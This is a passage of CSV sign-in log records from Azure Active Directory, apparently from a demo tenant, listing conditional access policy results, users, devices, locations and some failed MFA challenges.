'5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 10:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",d57fb780-1a14-4a75-9a44-f6b02e930a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,d57fb780-1a14-4a75-9a44-f6b02e930a00,SigninLogs,Sucess,36.6404686,-78.26995087
+1470,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:32.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5509b988-bd2f-4848-84dd-6f93978b1fe9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:45,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",0d3dadc7-5b90-4194-87e2-04e093ca0500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Teams Services,0d3dadc7-5b90-4194-87e2-04e093ca0500,SigninLogs,Sucess,34.06555176,-118.2405396
+1471,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:41.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50074,None,User did not pass the MFA challenge.,0,dfe2b6e7-f85a-424d-b915-0eb870e66d9e,Microsoft.aadiam,Microsoft.aadiam,,bdb72692-2275-412b-8af0-ea21c2ebd174,4,,Microsoft Azure,0c1307d4-29d6-4389-a11c-5cbe7f65d7fa,,[],notApplied,08/04/2020 10:24,"{'operatingSystem': 'iOS 13', 'deviceId': '', 'browser': 'Mobile Safari 13.4'}",3f36af51-0198-41cf-a56a-8a51cfbf2c00,,,{'geoCoordinates': {}},none,none,none,none,[],"{'errorCode': 50074, 'failureReason': 'User did not pass the MFA challenge.'}",bdb72692-2275-412b-8af0-ea21c2ebd174,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3f36af51-0198-41cf-a56a-8a51cfbf2c00,SigninLogs,Failed,,
+1472,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:59.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5509b988-bd2f-4848-84dd-6f93978b1fe9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:45,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",e9cfabe1-d666-446f-aeb7-58172db30700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Teams UIS,e9cfabe1-d666-446f-aeb7-58172db30700,SigninLogs,Sucess,34.06555176,-118.2405396
+1473,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:40.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c1294a39-2825-4728-bbb6-7616855480a8,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:35,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",f81997e3-0b26-42cc-8532-c4de14a30700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,f81997e3-0b26-42cc-8532-c4de14a30700,SigninLogs,Sucess,50.6406517,5.572050095
+1474,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:41.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50074,None,User did not pass the MFA challenge.,0,dfe2b6e7-f85a-424d-b915-0eb870e66d9e,Microsoft.aadiam,Microsoft.aadiam,,bdb72692-2275-412b-8af0-ea21c2ebd174,4,,Microsoft Azure,0c1307d4-29d6-4389-a11c-5cbe7f65d7fa,,[],notApplied,08/04/2020 10:24,"{'operatingSystem': 'iOS 13', 'deviceId': '', 'browser': 'Mobile Safari 13.4'}",3f36af51-0198-41cf-a56a-8a51cfbf2c00,,,{'geoCoordinates': {}},none,none,none,none,[],"{'errorCode': 50074, 'failureReason': 'User did not pass the MFA challenge.'}",bdb72692-2275-412b-8af0-ea21c2ebd174,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3f36af51-0198-41cf-a56a-8a51cfbf2c00,SigninLogs,Failed,,
+1475,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:07.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5a052e7e-2284-4115-9ddd-003f29550700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5a052e7e-2284-4115-9ddd-003f29550700,SigninLogs,Sucess,50.6406517,5.572050095
+1476,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:26.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3684e1dd-791e-4d72-9b15-2e4b085de467,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Microsoft 365 Security and Compliance Center,80ccca67-54bd-44ab-8625-4b79c4dc7775,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5a052e7e-2284-4115-9ddd-003f89560700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5a052e7e-2284-4115-9ddd-003f89560700,SigninLogs,Sucess,50.6406517,5.572050095
+1477,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:45.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,79faf53e-b14c-409e-aa83-a74dd0943d35,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5a052e7e-2284-4115-9ddd-003f03580700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5a052e7e-2284-4115-9ddd-003f03580700,SigninLogs,Sucess,50.6406517,5.572050095
+1478,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:00.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5509b988-bd2f-4848-84dd-6f93978b1fe9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:46,"{'operatingSystem': 'Windows 10', 'deviceId': 